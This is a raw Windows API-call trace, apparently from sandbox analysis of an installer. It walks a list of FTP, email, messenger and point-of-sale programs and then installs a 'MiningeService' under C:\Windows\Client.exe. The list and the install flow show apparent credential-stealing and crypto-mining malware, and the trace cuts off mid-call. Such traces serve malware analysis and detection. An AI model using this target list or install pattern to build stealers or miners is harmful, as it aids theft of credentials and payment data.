[0261.659] lstrcmpiA (lpString1="pushweight.exe", lpString2="SleepController.exe") returned -1 [0261.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="film.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="film.exe", lpUsedDefaultChar=0x0) returned 9 [0261.659] lstrcmpiA (lpString1="film.exe", lpString2="SleepController.exe") returned -1 [0261.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dead.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dead.exe", lpUsedDefaultChar=0x0) returned 9 [0261.659] lstrcmpiA (lpString1="dead.exe", lpString2="SleepController.exe") returned -1 [0261.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="than.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="than.exe", lpUsedDefaultChar=0x0) returned 9 [0261.659] lstrcmpiA (lpString1="than.exe", lpString2="SleepController.exe") returned 1 [0261.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="feel.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="feel.exe", lpUsedDefaultChar=0x0) returned 9 [0261.659] lstrcmpiA (lpString1="feel.exe", lpString2="SleepController.exe") returned -1 [0261.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0261.659] lstrcmpiA (lpString1="3dftp.exe", lpString2="SleepController.exe") returned -1 [0261.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0261.659] lstrcmpiA (lpString1="absolutetelnet.exe", lpString2="SleepController.exe") returned -1 [0261.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0261.659] lstrcmpiA (lpString1="alftp.exe", lpString2="SleepController.exe") returned -1 [0261.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0261.659] lstrcmpiA (lpString1="barca.exe", lpString2="SleepController.exe") returned -1 [0261.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0261.659] lstrcmpiA (lpString1="bitkinex.exe", lpString2="SleepController.exe") returned -1 [0261.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0261.659] lstrcmpiA (lpString1="coreftp.exe", lpString2="SleepController.exe") returned -1 [0261.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0261.659] lstrcmpiA (lpString1="far.exe", lpString2="SleepController.exe") returned -1 [0261.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0261.659] lstrcmpiA (lpString1="filezilla.exe", lpString2="SleepController.exe") returned -1 [0261.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0261.659] lstrcmpiA (lpString1="flashfxp.exe", lpString2="SleepController.exe") returned -1 [0261.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0261.659] lstrcmpiA (lpString1="fling.exe", lpString2="SleepController.exe") returned -1 [0261.659] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0261.660] lstrcmpiA (lpString1="foxmailincmail.exe", lpString2="SleepController.exe") returned -1 [0261.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0261.660] lstrcmpiA (lpString1="gmailnotifierpro.exe", lpString2="SleepController.exe") returned -1 [0261.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="icq.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="icq.exe", lpUsedDefaultChar=0x0) returned 8 [0261.660] lstrcmpiA (lpString1="icq.exe", lpString2="SleepController.exe") returned -1 [0261.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="leechftp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="leechftp.exe", lpUsedDefaultChar=0x0) returned 13 [0261.660] lstrcmpiA (lpString1="leechftp.exe", lpString2="SleepController.exe") returned -1 [0261.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ncftp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ncftp.exe", lpUsedDefaultChar=0x0) returned 10 [0261.660] lstrcmpiA (lpString1="ncftp.exe", lpString2="SleepController.exe") returned -1 [0261.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="notepad.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="notepad.exe", lpUsedDefaultChar=0x0) returned 12 [0261.660] lstrcmpiA (lpString1="notepad.exe", lpString2="SleepController.exe") returned -1 [0261.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="operamail.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="operamail.exe", lpUsedDefaultChar=0x0) returned 14 [0261.660] lstrcmpiA (lpString1="operamail.exe", lpString2="SleepController.exe") returned -1 [0261.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="outlook.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="outlook.exe", lpUsedDefaultChar=0x0) returned 12 [0261.660] lstrcmpiA (lpString1="outlook.exe", lpString2="SleepController.exe") returned -1 [0261.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="pidgin.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pidgin.exe", lpUsedDefaultChar=0x0) returned 11 [0261.660] lstrcmpiA (lpString1="pidgin.exe", lpString2="SleepController.exe") returned -1 [0261.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="scriptftp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="scriptftp.exe", lpUsedDefaultChar=0x0) returned 14 [0261.660] lstrcmpiA (lpString1="scriptftp.exe", lpString2="SleepController.exe") returned -1 [0261.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="skype.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="skype.exe", lpUsedDefaultChar=0x0) returned 10 [0261.660] lstrcmpiA (lpString1="skype.exe", lpString2="SleepController.exe") returned -1 [0261.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="smartftp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="smartftp.exe", lpUsedDefaultChar=0x0) returned 13 [0261.660] lstrcmpiA (lpString1="smartftp.exe", lpString2="SleepController.exe") returned 1 [0261.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="thunderbird.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="thunderbird.exe", lpUsedDefaultChar=0x0) returned 16 [0261.660] lstrcmpiA (lpString1="thunderbird.exe", lpString2="SleepController.exe") returned 1 [0261.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="trillian.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="trillian.exe", lpUsedDefaultChar=0x0) returned 13 [0261.660] lstrcmpiA (lpString1="trillian.exe", lpString2="SleepController.exe") returned 1 [0261.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="webdrive.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="webdrive.exe", lpUsedDefaultChar=0x0) returned 13 [0261.660] lstrcmpiA (lpString1="webdrive.exe", lpString2="SleepController.exe") returned 1 [0261.660] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="whatsapp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="whatsapp.exe", lpUsedDefaultChar=0x0) returned 13 [0261.660] lstrcmpiA (lpString1="whatsapp.exe", lpString2="SleepController.exe") returned 1 [0261.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="winscp.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="winscp.exe", lpUsedDefaultChar=0x0) returned 11 [0261.661] lstrcmpiA (lpString1="winscp.exe", lpString2="SleepController.exe") returned 1 [0261.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="yahoomessenger.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="yahoomessenger.exe", lpUsedDefaultChar=0x0) returned 19 [0261.661] lstrcmpiA (lpString1="yahoomessenger.exe", lpString2="SleepController.exe") returned 1 [0261.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="active-charge.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="active-charge.exe", lpUsedDefaultChar=0x0) returned 18 [0261.661] lstrcmpiA (lpString1="active-charge.exe", lpString2="SleepController.exe") returned -1 [0261.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="accupos.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accupos.exe", lpUsedDefaultChar=0x0) returned 12 [0261.661] lstrcmpiA (lpString1="accupos.exe", lpString2="SleepController.exe") returned -1 [0261.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="afr38.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="afr38.exe", lpUsedDefaultChar=0x0) returned 10 [0261.661] lstrcmpiA (lpString1="afr38.exe", lpString2="SleepController.exe") returned -1 [0261.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="aldelo.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="aldelo.exe", lpUsedDefaultChar=0x0) returned 11 [0261.661] lstrcmpiA (lpString1="aldelo.exe", lpString2="SleepController.exe") returned -1 [0261.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ccv_server.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ccv_server.exe", lpUsedDefaultChar=0x0) returned 15 [0261.661] lstrcmpiA (lpString1="ccv_server.exe", lpString2="SleepController.exe") returned -1 [0261.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="centralcreditcard.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="centralcreditcard.exe", lpUsedDefaultChar=0x0) returned 22 [0261.661] lstrcmpiA (lpString1="centralcreditcard.exe", lpString2="SleepController.exe") returned -1 [0261.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="creditservice.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="creditservice.exe", lpUsedDefaultChar=0x0) returned 18 [0261.661] lstrcmpiA (lpString1="creditservice.exe", lpString2="SleepController.exe") returned -1 [0261.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="edcsvr.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="edcsvr.exe", lpUsedDefaultChar=0x0) returned 11 [0261.661] lstrcmpiA (lpString1="edcsvr.exe", lpString2="SleepController.exe") returned -1 [0261.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="fpos.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fpos.exe", lpUsedDefaultChar=0x0) returned 9 [0261.661] lstrcmpiA (lpString1="fpos.exe", lpString2="SleepController.exe") returned -1 [0261.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="isspos.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="isspos.exe", lpUsedDefaultChar=0x0) returned 11 [0261.661] lstrcmpiA (lpString1="isspos.exe", lpString2="SleepController.exe") returned -1 [0261.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mxslipstream.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mxslipstream.exe", lpUsedDefaultChar=0x0) returned 17 [0261.661] lstrcmpiA (lpString1="mxslipstream.exe", lpString2="SleepController.exe") returned -1 [0261.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="omnipos.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omnipos.exe", lpUsedDefaultChar=0x0) returned 12 [0261.661] lstrcmpiA (lpString1="omnipos.exe", lpString2="SleepController.exe") returned -1 [0261.661] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spcwin.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spcwin.exe", lpUsedDefaultChar=0x0) returned 11 [0261.661] lstrcmpiA (lpString1="spcwin.exe", lpString2="SleepController.exe") returned 1 [0261.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="spgagentservice.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="spgagentservice.exe", lpUsedDefaultChar=0x0) returned 20 [0261.662] lstrcmpiA (lpString1="spgagentservice.exe", lpString2="SleepController.exe") returned 1 [0261.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="utg2.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="utg2.exe", lpUsedDefaultChar=0x0) returned 9 [0261.662] lstrcmpiA (lpString1="utg2.exe", lpString2="SleepController.exe") returned 1 [0261.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="through recognize.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="through recognize.exe", lpUsedDefaultChar=0x0) returned 22 [0261.662] lstrcmpiA (lpString1="through recognize.exe", lpString2="SleepController.exe") returned 1 [0261.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WmiPrvSE.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WmiPrvSE.exe", lpUsedDefaultChar=0x0) returned 13 [0261.662] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="SleepController.exe") returned 1 [0261.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="audiodg.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="audiodg.exe", lpUsedDefaultChar=0x0) returned 12 [0261.662] lstrcmpiA (lpString1="audiodg.exe", lpString2="SleepController.exe") returned -1 [0261.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="taskeng.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="taskeng.exe", lpUsedDefaultChar=0x0) returned 12 [0261.662] lstrcmpiA (lpString1="taskeng.exe", lpString2="SleepController.exe") returned 1 [0261.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.662] lstrcmpiA (lpString1="dllhost.exe", lpString2="SleepController.exe") returned -1 [0261.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="dllhost.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dllhost.exe", lpUsedDefaultChar=0x0) returned 12 [0261.662] lstrcmpiA (lpString1="dllhost.exe", lpString2="SleepController.exe") returned -1 [0261.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="88.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="88.exe", lpUsedDefaultChar=0x0) returned 7 [0261.662] lstrcmpiA (lpString1="88.exe", lpString2="SleepController.exe") returned -1 [0261.662] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="99.exe", cchWideChar=-1, lpMultiByteStr=0x2d6faa0, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="99.exe", lpUsedDefaultChar=0x0) returned 7 [0261.662] lstrcmpiA (lpString1="99.exe", lpString2="SleepController.exe") returned -1 [0261.663] LocalFree (hMem=0x2aadc8) returned 0x0 [0261.663] lstrcpynA (in: lpString1=0x27f71c, lpString2="603", iMaxLength=32 | out: lpString1="603") returned="603" [0261.663] MulDiv (nNumber=17, nNumerator=30000, nDenominator=60) returned 8500 [0261.663] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x2134, lParam=0x0) returned 0x1f40 [0261.663] lstrcpynA (in: lpString1=0x432800, lpString2="603", iMaxLength=1024 | out: lpString1="603") returned="603" [0261.664] MulDiv (nNumber=18, nNumerator=30000, nDenominator=60) returned 9000 [0261.664] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x2328, lParam=0x0) returned 0x2134 [0261.664] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Windows\\", iMaxLength=1024 | out: lpString1="C:\\Windows\\") returned="C:\\Windows\\" [0261.665] lstrlenA (lpString="C:\\Windows") returned 10 [0261.665] lstrcpynA (in: lpString1=0x42e3ab, lpString2="Client.exe", iMaxLength=1024 | out: lpString1="Client.exe") returned="Client.exe" [0261.665] lstrlenA (lpString="Client.exe") returned 10 [0261.665] lstrcpynA (in: lpString1=0x40a410, lpString2="C:\\Windows\\Client.exe", iMaxLength=1024 | out: lpString1="C:\\Windows\\Client.exe") returned="C:\\Windows\\Client.exe" [0261.668] FindFirstFileA (in: lpFileName="C:\\Windows\\Client.exe", lpFindFileData=0x42c0b8 | out: lpFindFileData=0x42c0b8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc4afe8a0, ftCreationTime.dwHighDateTime=0x1d7fb6e, ftLastAccessTime.dwLowDateTime=0xc4afe8a0, ftLastAccessTime.dwHighDateTime=0x1d7fb6e, ftLastWriteTime.dwLowDateTime=0xc4afe8a0, ftLastWriteTime.dwHighDateTime=0x1d7fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x8, cFileName="nsaEA97.tmp", cAlternateFileName="")) returned 0xffffffff [0261.669] MulDiv (nNumber=22, nNumerator=30000, nDenominator=60) returned 11000 [0261.669] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x2af8, lParam=0x0) returned 0x2328 [0261.669] lstrcpynA (in: lpString1=0x42a048, lpString2="The service is not found in the system, I start the installation...", iMaxLength=1024 | out: lpString1="The service is not found in the system, I start the installation...") returned="The service is not found in the system, I start the installation..." [0261.669] lstrlenA (lpString="The service is not found in the system, I start the installation...") returned 67 [0261.669] SetWindowTextA (hWnd=0x20324, lpString="The service is not found in the system, I start the installation...") returned 1 [0261.671] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x5 [0261.671] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fd70) returned 0x5 [0261.673] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x5, lParam=0x0) returned 0x1 [0261.673] MulDiv (nNumber=23, nNumerator=30000, nDenominator=60) returned 11500 [0261.673] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x2cec, lParam=0x0) returned 0x2af8 [0261.673] lstrcpynA (in: lpString1=0x42a048, lpString2="Stopping the old service MiningeService...", iMaxLength=1024 | out: lpString1="Stopping the old service MiningeService...") returned="Stopping the old service MiningeService..." [0261.673] lstrlenA (lpString="Stopping the old service MiningeService...") returned 42 [0261.673] SetWindowTextA (hWnd=0x20324, lpString="Stopping the old service MiningeService...") returned 1 [0261.674] SendMessageA (hWnd=0x302f8, Msg=0x1004, wParam=0x0, lParam=0x0) returned 0x6 [0261.674] SendMessageA (hWnd=0x302f8, Msg=0x1007, wParam=0x0, lParam=0x2d6fd70) returned 0x6 [0261.676] SendMessageA (hWnd=0x302f8, Msg=0x1013, wParam=0x6, lParam=0x0) returned 0x1 [0261.676] MulDiv (nNumber=24, nNumerator=30000, nDenominator=60) returned 12000 [0261.676] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x2ee0, lParam=0x0) returned 0x2cec [0261.676] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0261.677] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0261.677] lstrcpynA (in: lpString1=0x40ac10, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0261.677] lstrcpynA (in: lpString1=0x40b010, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0261.677] lstrcmpiA (lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", lpString2="") returned 1 [0261.677] MulDiv (nNumber=25, nNumerator=30000, nDenominator=60) returned 12500 [0261.677] SendMessageA (hWnd=0x302fe, Msg=0x402, wParam=0x30d4, lParam=0x0) returned 0x2ee0 [0261.678] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp" [0261.678] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp") returned 48 [0261.678] lstrcpynA (in: lpString1=0x40b010, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0261.678] lstrcpynA (in: lpString1=0x40a410, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\nsaEA97.tmp\\nsExec.dll" [0261.679] GetFileAttributesA 